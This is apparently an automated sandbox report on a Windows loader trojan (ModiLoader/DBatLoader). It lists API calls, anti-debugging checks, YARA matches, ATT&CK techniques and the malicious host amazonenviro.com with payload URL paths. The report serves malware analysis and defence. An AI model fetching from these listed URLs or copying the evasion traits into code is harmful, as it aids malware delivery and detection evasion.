            Source: C:\Users\user\Desktop\UTstKgkJNY.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
            Source: UTstKgkJNY.exeStatic file information: File size 1161216 > 1048576

            Data Obfuscation

            barindex
            Source: Yara matchFile source: 1.2.UTstKgkJNY.exe.21e65a8.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.UTstKgkJNY.exe.2860000.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.UTstKgkJNY.exe.21e65a8.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000001.00000002.2528020795.000000007FBB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2512810785.00000000021E6000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeCode function: 1_2_02878798 LoadLibraryW,GetProcAddress,FreeLibrary,1_2_02878798
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeCode function: 1_2_0288D2FC push 0288D367h; ret 1_2_0288D35F
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeCode function: 1_2_028632FC push eax; ret 1_2_02863338
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeCode function: 1_2_0286635C push 028663B7h; ret 1_2_028663AF
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeCode function: 1_2_0286635A push 028663B7h; ret 1_2_028663AF
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeCode function: 1_2_0288D0AC push 0288D125h; ret 1_2_0288D11D
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeCode function: 1_2_0288D1F8 push 0288D288h; ret 1_2_0288D280
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeCode function: 1_2_0288D144 push 0288D1ECh; ret 1_2_0288D1E4
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeCode function: 1_2_028786B8 push 028786FAh; ret 1_2_028786F2
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeCode function: 1_2_02866736 push 0286677Ah; ret 1_2_02866772
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeCode function: 1_2_02866738 push 0286677Ah; ret 1_2_02866772
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeCode function: 1_2_0286C4EC push ecx; mov dword ptr [esp], edx1_2_0286C4F1
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeCode function: 1_2_0286D520 push 0286D54Ch; ret 1_2_0286D544
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeCode function: 1_2_0286CB6C push 0286CCF2h; ret 1_2_0286CCEA
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeCode function: 1_2_0287788C push 02877909h; ret 1_2_02877901
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeCode function: 1_2_028768C6 push 02876973h; ret 1_2_0287696B
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeCode function: 1_2_028768C8 push 02876973h; ret 1_2_0287696B
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeCode function: 1_2_0287E9E8 push ecx; mov dword ptr [esp], edx1_2_0287E9ED
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeCode function: 1_2_0287890E push 02878948h; ret 1_2_02878940
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeCode function: 1_2_0287A917 push 0287A950h; ret 1_2_0287A948
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeCode function: 1_2_02878910 push 02878948h; ret 1_2_02878940
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeCode function: 1_2_0287A918 push 0287A950h; ret 1_2_0287A948
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeCode function: 1_2_0286C95E push 0286CCF2h; ret 1_2_0286CCEA
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeCode function: 1_2_02872EE0 push 02872F56h; ret 1_2_02872F4E
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeCode function: 1_2_0288BFA0 push 0288C1C8h; ret 1_2_0288C1C0
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeCode function: 1_2_02872FEC push 02873039h; ret 1_2_02873031
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeCode function: 1_2_02872FEB push 02873039h; ret 1_2_02873031
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeCode function: 1_2_02875DFC push ecx; mov dword ptr [esp], edx1_2_02875DFE
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeCode function: 1_2_0287A954 GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_2_0287A954
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeCode function: 1_2_028658B4 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,1_2_028658B4
            Source: UTstKgkJNY.exe, 00000001.00000003.2489466445.000000000059E000.00000004.00000020.00020000.00000000.sdmp, UTstKgkJNY.exe, 00000001.00000003.2489466445.00000000005B7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeAPI call chain: ExitProcess graph end nodegraph_1-29032

            Anti Debugging

            barindex
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeCode function: 1_2_0287F024 GetModuleHandleW,GetProcAddress,CheckRemoteDebuggerPresent,1_2_0287F024
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeCode function: 1_2_02878798 LoadLibraryW,GetProcAddress,FreeLibrary,1_2_02878798
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,1_2_02865A78
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeCode function: GetLocaleInfoA,1_2_0286A790
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeCode function: GetLocaleInfoA,1_2_0286A744
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeCode function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,1_2_02865B84
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeCode function: 1_2_0286918C GetLocalTime,1_2_0286918C
            Source: C:\Users\user\Desktop\UTstKgkJNY.exeCode function: 1_2_0286B70C GetVersionExA,1_2_0286B70C
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire Infrastructure1
            Valid Accounts
            1
            Native API
            1
            Valid Accounts
            1
            Valid Accounts
            1
            Valid Accounts
            OS Credential Dumping1
            System Time Discovery
            Remote Services1
            Archive Collected Data
            11
            Encrypted Channel
            Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault AccountsScheduled Task/Job1
            DLL Side-Loading
            1
            Access Token Manipulation
            1
            Access Token Manipulation
            LSASS Memory1
            Query Registry
            Remote Desktop ProtocolData from Removable Media1
            Ingress Tool Transfer
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading
            1
            Virtualization/Sandbox Evasion
            Security Account Manager111
            Security Software Discovery
            SMB/Windows Admin SharesData from Network Shared Drive2
            Non-Application Layer Protocol
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
            Deobfuscate/Decode Files or Information
            NTDS1
            Virtualization/Sandbox Evasion
            Distributed Component Object ModelInput Capture113
            Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
            Obfuscated Files or Information
            LSA Secrets1
            System Network Connections Discovery
            SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            DLL Side-Loading
            Cached Domain Credentials1
            File and Directory Discovery
            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync24
            System Information Discovery
            Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            UTstKgkJNY.exe68%ReversingLabsWin32.Trojan.ModiLoader
            No Antivirus matches
            No Antivirus matches
            No Antivirus matches
            SourceDetectionScannerLabelLink
            https://amazonenviro.com/245_Tzzlqsjvkee$V0%Avira URL Cloudsafe
            https://amazonenviro.com/245_Tzzlqsjvkee0%Avira URL Cloudsafe
            https://amazonenviro.com/245_Tzzlqsjvkee00%Avira URL Cloudsafe
            https://amazonenviro.com/245_Tzzlqsjvkeei0%Avira URL Cloudsafe
            https://amazonenviro.com/245_Tzzlqsjvkeem0%Avira URL Cloudsafe
            https://amazonenviro.com/245_Tzzlqsjvkee.0%Avira URL Cloudsafe
            https://amazonenviro.com/245_Tzzlqsjvkeeui0%Avira URL Cloudsafe
            https://amazonenviro.com/245_Tzzlqsjvkeep0%Avira URL Cloudsafe
            https://amazonenviro.com/245_TzzlqsjvkeeAL0%Avira URL Cloudsafe
            https://amazonenviro.com/245_TzzlqsjvkeeO0%Avira URL Cloudsafe
            https://amazonenviro.com/Ad00%Avira URL Cloudsafe
            https://amazonenviro.com/245_TzzlqsjvkeeHH0%Avira URL Cloudsafe
            https://amazonenviro.com/id(0%Avira URL Cloudsafe
            https://amazonenviro.com/yd80%Avira URL Cloudsafe
            https://amazonenviro.com/245_Tzzlqsjvkee50%Avira URL Cloudsafe
            https://amazonenviro.com/245_Tzzlqsjvkeec;0%Avira URL Cloudsafe
            https://amazonenviro.com/245_TzzlqsjvkeeQH0%Avira URL Cloudsafe
            https://amazonenviro.com/245_Tzzlqsjvkee770%Avira URL Cloudsafe
            https://amazonenviro.com:443/245_Tzzlqsjvkee0%Avira URL Cloudsafe
            https://amazonenviro.com/245_Tzzlqsjvkeec0%Avira URL Cloudsafe
            https://amazonenviro.com/245_TzzlqsjvkeeoH0%Avira URL Cloudsafe
            https://amazonenviro.com/0%Avira URL Cloudsafe
            https://amazonenviro.com/Qd0%Avira URL Cloudsafe
            https://amazonenviro.com/40%Avira URL Cloudsafe
            NameIPActiveMaliciousAntivirus DetectionReputation
            amazonenviro.com
            166.62.27.188
            truefalse
              high
              NameMaliciousAntivirus DetectionReputation
              https://amazonenviro.com/245_Tzzlqsjvkeetrue
              • Avira URL Cloud: safe
              unknown
              NameSourceMaliciousAntivirus DetectionReputation
              https://amazonenviro.com/245_Tzzlqsjvkee$VUTstKgkJNY.exe, 00000001.00000003.1303825538.00000000005F1000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://amazonenviro.com/245_TzzlqsjvkeeiUTstKgkJNY.exe, 00000001.00000002.2511530710.00000000005B7000.00000004.00000020.00020000.00000000.sdmp, UTstKgkJNY.exe, 00000001.00000003.1320430561.00000000005FF000.00000004.00000020.00020000.00000000.sdmp, UTstKgkJNY.exe, 00000001.00000003.1303825538.00000000005F1000.00000004.00000020.00020000.00000000.sdmp, UTstKgkJNY.exe, 00000001.00000003.1336787995.00000000005FF000.00000004.00000020.00020000.00000000.sdmp, UTstKgkJNY.exe, 00000001.00000003.2489466445.00000000005B7000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://amazonenviro.com/245_Tzzlqsjvkee0UTstKgkJNY.exe, 00000001.00000002.2511530710.0000000000601000.00000004.00000020.00020000.00000000.sdmp, UTstKgkJNY.exe, 00000001.00000003.1336787995.00000000005FF000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://amazonenviro.com/245_TzzlqsjvkeepUTstKgkJNY.exe, 00000001.00000003.1303825538.00000000005F1000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://amazonenviro.com/245_TzzlqsjvkeeuiUTstKgkJNY.exe, 00000001.00000002.2511530710.00000000005B7000.00000004.00000020.00020000.00000000.sdmp, UTstKgkJNY.exe, 00000001.00000003.2489466445.00000000005B7000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://amazonenviro.com/245_TzzlqsjvkeeOUTstKgkJNY.exe, 00000001.00000003.1369796993.0000000000620000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://amazonenviro.com/245_Tzzlqsjvkee.UTstKgkJNY.exe, 00000001.00000003.2489466445.00000000005EE000.00000004.00000020.00020000.00000000.sdmp, UTstKgkJNY.exe, 00000001.00000002.2511530710.00000000005EE000.00000004.00000020.00020000.00000000.sdmp, UTstKgkJNY.exe, 00000001.00000003.1336787995.00000000005ED000.00000004.00000020.00020000.00000000.sdmp, UTstKgkJNY.exe, 00000001.00000003.2446526925.00000000005EE000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://amazonenviro.com/245_TzzlqsjvkeemUTstKgkJNY.exe, 00000001.00000003.2489466445.00000000005EE000.00000004.00000020.00020000.00000000.sdmp, UTstKgkJNY.exe, 00000001.00000002.2511530710.00000000005EE000.00000004.00000020.00020000.00000000.sdmp, UTstKgkJNY.exe, 00000001.00000003.1512344907.00000000005ED000.00000004.00000020.00020000.00000000.sdmp, UTstKgkJNY.exe, 00000001.00000003.2446526925.00000000005EE000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://amazonenviro.com/245_TzzlqsjvkeeALUTstKgkJNY.exe, 00000001.00000003.1320430561.00000000005FF000.00000004.00000020.00020000.00000000.sdmp, UTstKgkJNY.exe, 00000001.00000003.1369796993.00000000005FF000.00000004.00000020.00020000.00000000.sdmp, UTstKgkJNY.exe, 00000001.00000003.1303825538.00000000005F1000.00000004.00000020.00020000.00000000.sdmp, UTstKgkJNY.exe, 00000001.00000003.1336787995.00000000005FF000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://amazonenviro.com/Ad0UTstKgkJNY.exe, 00000001.00000003.1512344907.00000000005FD000.00000004.00000020.00020000.00000000.sdmp, UTstKgkJNY.exe, 00000001.00000002.2511530710.000000000060E000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://amazonenviro.com/id(UTstKgkJNY.exe, 00000001.00000003.2446526925.000000000060E000.00000004.00000020.00020000.00000000.sdmp, UTstKgkJNY.exe, 00000001.00000003.1369796993.000000000060E000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://amazonenviro.com/yd8UTstKgkJNY.exe, 00000001.00000003.2446526925.000000000060E000.00000004.00000020.00020000.00000000.sdmp, UTstKgkJNY.exe, 00000001.00000002.2511530710.000000000060E000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://amazonenviro.com/245_Tzzlqsjvkee5UTstKgkJNY.exe, 00000001.00000003.1369796993.00000000005FF000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://amazonenviro.com/245_Tzzlqsjvkee77UTstKgkJNY.exe, 00000001.00000003.2489466445.000000000059E000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://amazonenviro.com/245_TzzlqsjvkeeHHUTstKgkJNY.exe, 00000001.00000003.2446526925.0000000000617000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://amazonenviro.com:443/245_TzzlqsjvkeeUTstKgkJNY.exe, 00000001.00000003.2446526925.00000000005E5000.00000004.00000020.00020000.00000000.sdmp, UTstKgkJNY.exe, 00000001.00000003.2489466445.00000000005E4000.00000004.00000020.00020000.00000000.sdmp, UTstKgkJNY.exe, 00000001.00000002.2511530710.00000000005E5000.00000004.00000020.00020000.00000000.sdmp, UTstKgkJNY.exe, 00000001.00000003.1512344907.00000000005E5000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://amazonenviro.com/245_Tzzlqsjvkeec;UTstKgkJNY.exe, 00000001.00000003.1633956543.0000000000617000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://amazonenviro.com/245_TzzlqsjvkeeQHUTstKgkJNY.exe, 00000001.00000003.1512344907.00000000005FD000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://amazonenviro.com/245_TzzlqsjvkeecUTstKgkJNY.exe, 00000001.00000003.2446526925.00000000005FF000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://amazonenviro.com/UTstKgkJNY.exe, 00000001.00000003.2446526925.000000000060E000.00000004.00000020.00020000.00000000.sdmp, UTstKgkJNY.exe, 00000001.00000003.1512344907.00000000005FD000.00000004.00000020.00020000.00000000.sdmp, UTstKgkJNY.exe, 00000001.00000002.2511530710.00000000005B7000.00000004.00000020.00020000.00000000.sdmp, UTstKgkJNY.exe, 00000001.00000003.1633956543.000000000060E000.00000004.00000020.00020000.00000000.sdmp, UTstKgkJNY.exe, 00000001.00000003.1369796993.000000000060E000.00000004.00000020.00020000.00000000.sdmp, UTstKgkJNY.exe, 00000001.00000003.2489466445.000000000060E000.00000004.00000020.00020000.00000000.sdmp, UTstKgkJNY.exe, 00000001.00000003.1303825538.00000000005F1000.00000004.00000020.00020000.00000000.sdmptrue
              • Avira URL Cloud: safe
              unknown
              https://amazonenviro.com/245_TzzlqsjvkeeoHUTstKgkJNY.exe, 00000001.00000003.2489466445.0000000000617000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://amazonenviro.com/QdUTstKgkJNY.exe, 00000001.00000003.1512344907.00000000005FD000.00000004.00000020.00020000.00000000.sdmp, UTstKgkJNY.exe, 00000001.00000003.1336787995.000000000060E000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://amazonenviro.com/4UTstKgkJNY.exe, 00000001.00000003.1320430561.000000000060E000.00000004.00000020.00020000.00000000.sdmp, UTstKgkJNY.exe, 00000001.00000003.1336787995.000000000060E000.00000004.00000020.00020000.00000000.sdmp, UTstKgkJNY.exe, 00000001.00000003.1303825538.00000000005F1000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              • No. of IPs < 25%
              • 25% < No. of IPs < 50%
              • 50% < No. of IPs < 75%
              • 75% < No. of IPs
              IPDomainCountryFlagASNASN NameMalicious
              166.62.27.188
              amazonenviro.comUnited States
              26496AS-26496-GO-DADDY-COM-LLCUSfalse
              Joe Sandbox version:42.0.0 Malachite
              Analysis ID:1590521
              Start date and time:2025-01-14 08:24:09 +01:00
              Joe Sandbox product:CloudBasic
              Overall analysis duration:0h 5m 1s
              Hypervisor based Inspection enabled:false
              Report type:full
              Cookbook file name:default.jbs
              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
              Number of analysed new started processes analysed:12
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • HCA enabled
              • EGA enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Sample name:UTstKgkJNY.exe
              renamed because original name is a hash value
              Original Sample Name:7e6af615a074f41ea63ef69a047e8f6d.exe
              Detection:MAL
              Classification:mal76.troj.evad.winEXE@1/0@1/1
              EGA Information:
              • Successful, ratio: 100%
              HCA Information:
              • Successful, ratio: 99%
              • Number of executed functions: 23
              • Number of non-executed functions: 38
              Cookbook Comments:
              • Found application associated with file extension: .exe
              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, Sgrmuserer.exe, conhost.exe, svchost.exe
              • Excluded IPs from analysis (whitelisted): 13.107.246.45, 172.202.163.200
              • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
              • Not all processes where analyzed, report is missing behavior information
              • Report size getting too big, too many NtDeviceIoControlFile calls found.
              • Report size getting too big, too many NtOpenFile calls found.
              • Report size getting too big, too many NtOpenKeyEx calls found.
              • Report size getting too big, too many NtProtectVirtualMemory calls found.
              • Report size getting too big, too many NtQueryValueKey calls found.
              • VT rate limit hit for: UTstKgkJNY.exe
              TimeTypeDescription
              02:24:59API Interceptor77x Sleep call for process: UTstKgkJNY.exe modified
              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              166.62.27.188On9ahUpI4R.exeGet hashmaliciousDBatLoaderBrowse
              • amazonenviro.com/245_Aiymwhpjxsg
              UAHIzSm2x2.exeGet hashmaliciousDBatLoaderBrowse
              • amazonenviro.com/245_Aiymwhpjxsg
              zYj1wg0cM2.docGet hashmaliciousDBatLoaderBrowse
              • amazonenviro.com/245_Aiymwhpjxsg
